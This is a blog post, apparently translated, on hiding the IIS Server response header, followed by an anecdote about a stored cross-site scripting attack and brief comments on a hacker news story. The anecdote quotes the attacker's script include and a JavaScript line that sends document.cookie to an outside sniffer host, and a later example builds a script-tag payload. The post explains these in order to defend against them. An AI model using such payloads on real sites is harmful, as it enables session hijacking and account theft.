ISAPI and IIS Server Header

IIS puts "Server: Microsoft-IIS6" or a string like it into the headers of every HTTP response it returns. That is something of a security hole, because for a person who is interested in doing bad things (or anything) to a server, the first rule is to learn what they are dealing with.

So I needed to close this hole. I did some research, but there are only old, old, old articles everywhere and most of them are not useful. Here is my solution. At the end, the source code for Xmask is included. I tried to change this server header to something else, like "Server: Mascix", but it did not work. I don't know why, but in the end it stripped out what I wanted 🙂
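As an added illustration of what a response filter like the one described here has to do (this is not Xmask's code and not an ISAPI filter, which would need the IIS SDK), the following Python strips the identifying headers from a raw HTTP response and audits whether any are left. The sample response, the header list and the function names are all constructed for this example; "X-Powered-By" is a second banner header IIS/ASP.NET commonly sends and is included for the same reason as "Server".

```python
# Added example (not Xmask's or IIS's code): remove identifying headers from a raw
# HTTP response the way a send-raw-data response filter would, then audit the result.
from typing import Iterable, Tuple

# Headers that identify the server software. "Server" is the one the post is about;
# "X-Powered-By" is a second banner IIS/ASP.NET commonly emits.
BANNER_HEADERS = ("server", "x-powered-by")


def split_response(raw: bytes) -> Tuple[bytes, bytes]:
    """Split a raw HTTP response into (header block, body).

    The header block ends at the first blank line; the body is never touched."""
    sep = raw.find(b"\r\n\r\n")
    if sep < 0:
        raise ValueError("no end of header block found")
    return raw[:sep], raw[sep + 4:]


def _header_name(line: bytes) -> str:
    name, _, _ = line.partition(b":")
    return name.strip().lower().decode("ascii", "replace")


def strip_banner_headers(raw: bytes, names: Iterable[str] = BANNER_HEADERS) -> bytes:
    """Return the response with the named headers removed (case-insensitive).

    Obsolete folded continuation lines (leading space/tab) follow the fate of the
    header they belong to, so a dropped header cannot leak through a continuation."""
    wanted = {n.lower() for n in names}
    head, body = split_response(raw)
    status_line, *header_lines = head.split(b"\r\n")
    kept, dropping = [], False
    for line in header_lines:
        if line[:1] in (b" ", b"\t"):        # continuation of the previous header
            if not dropping:
                kept.append(line)
            continue
        dropping = _header_name(line) in wanted
        if not dropping:
            kept.append(line)
    return b"\r\n".join([status_line, *kept]) + b"\r\n\r\n" + body


def find_banner_headers(raw: bytes, names: Iterable[str] = BANNER_HEADERS) -> dict:
    """Audit: which identifying headers are present, mapped to their values."""
    wanted = {n.lower() for n in names}
    head, _ = split_response(raw)
    found = {}
    for line in head.split(b"\r\n")[1:]:
        name, sep, value = line.partition(b":")
        key = name.strip().lower().decode("ascii", "replace")
        if sep and key in wanted:
            found[key] = value.strip().decode("ascii", "replace")
    return found


# Constructed sample response in the shape of what an IIS 6 server sends.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Microsoft-IIS/6.0\r\n"
    b"X-Powered-By: ASP.NET\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Length: 13\r\n"
    b"\r\n"
    b"<html></html>"
)

if __name__ == "__main__":
    print("before:", find_banner_headers(SAMPLE_RESPONSE))
    cleaned = strip_banner_headers(SAMPLE_RESPONSE)
    print("after: ", find_banner_headers(cleaned))
    print(cleaned.decode("ascii"))
```

The audit function is the part worth keeping around: run it against the raw bytes your own server returns after installing a filter, since a filter that rewrites the buffer slightly wrong (wrong line ending, header value kept) still shows up there.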

A small hack story

One of my friends came to me and told me he lost his admin user while he was browsing the web site. I was surprised, because normally that does not happen if the site is using ASP.NET 🙂 It's sad but true: ASP.NET does not allow HTML inclusion in POST data. Anyway, the hacker put script code into his name field like this:

src="http://inso.host.sk/sniffer/c.js"></script>

It's not a big deal; if you look at the output of this script you will see this:

a=new/**/Image();a.src='http://inso.host.sk/sniffer/s.php?a='+escape(document.cookie);

In the end it steals the browser's cookie and sends it to a PHP file, while the hacker browses another URL to see which fish fell for the trick 🙂 Anyway, today I did some research and found a solution to this situation:

https://addons.mozilla.org/en-US/firefox/addon/722

You should simply disable all JS inclusions in the page except those from the page's own domain. That will make your browser more secure.
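Blocking third-party scripts in the browser is the visitor's side of the fix. The site's side, as an added example that is not from the post, is to HTML-escape the name field when rendering it and to mark the session cookie HttpOnly so that `document.cookie` cannot read it even if a script does get in. The payload string, the script URL and the function names below are constructed for this example; the escaping uses Python's `html.escape` and the cookie uses `http.cookies` from the standard library.

```python
# Added example (not from the post): the unsafe rendering that lets the name field
# run as script, beside the escaped rendering and an HttpOnly session cookie.
import html
from http import cookies

# Constructed payload in the shape of the one described in the post; the URL is a
# hypothetical placeholder.
NAME_FROM_FORM = '<script src="http://evil.example/c.js"></script>'


def render_profile_unsafe(name: str) -> str:
    """The vulnerable version: user input is pasted straight into the HTML."""
    return "<p>Hello, {}</p>".format(name)


def render_profile(name: str) -> str:
    """The hardened version: angle brackets and quotes become entities, so the
    browser displays the name as text instead of parsing it as markup."""
    return "<p>Hello, {}</p>".format(html.escape(name, quote=True))


def session_cookie(session_id: str) -> str:
    """Set-Cookie value for the session. HttpOnly keeps it out of document.cookie,
    Secure keeps it off plain http, Path limits where the browser sends it."""
    jar = cookies.SimpleCookie()
    jar["session"] = session_id
    jar["session"]["httponly"] = True
    jar["session"]["secure"] = True
    jar["session"]["path"] = "/"
    return jar["session"].OutputString()


def contains_active_markup(rendered: str) -> bool:
    """Cheap check for a rendered fragment: a live <script tag means escaping was
    skipped somewhere. Useful as a test assertion on templates, not as a filter."""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print("unsafe:  ", render_profile_unsafe(NAME_FROM_FORM))
    print("escaped: ", render_profile(NAME_FROM_FORM))
    print("cookie:  ", session_cookie("abc123"))
```

Escaping on output is the control that actually stops the stored payload; the HttpOnly flag limits the damage from anything that slips past it, because the sniffer script shown above has nothing to send when `document.cookie` does not include the session.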

Yeni nesil hacker’lar: Edwin Pena | Olympos Security

I cracked up reading this. Programmers and marketers could not be summed up in a shorter or more concise story: a guy called Moore writes the code, Pena is screwing the whole place over, and our guy goes off and pays hospital bills.

The judge, figuring he cannot pay, fines Pena $150 thousand, and Moore goes to prison because he could not pay. Poor guy, he gets trampled everywhere 🙂 Honestly, we should open a greengrocer's or something; in this software business, writing code is not enough.....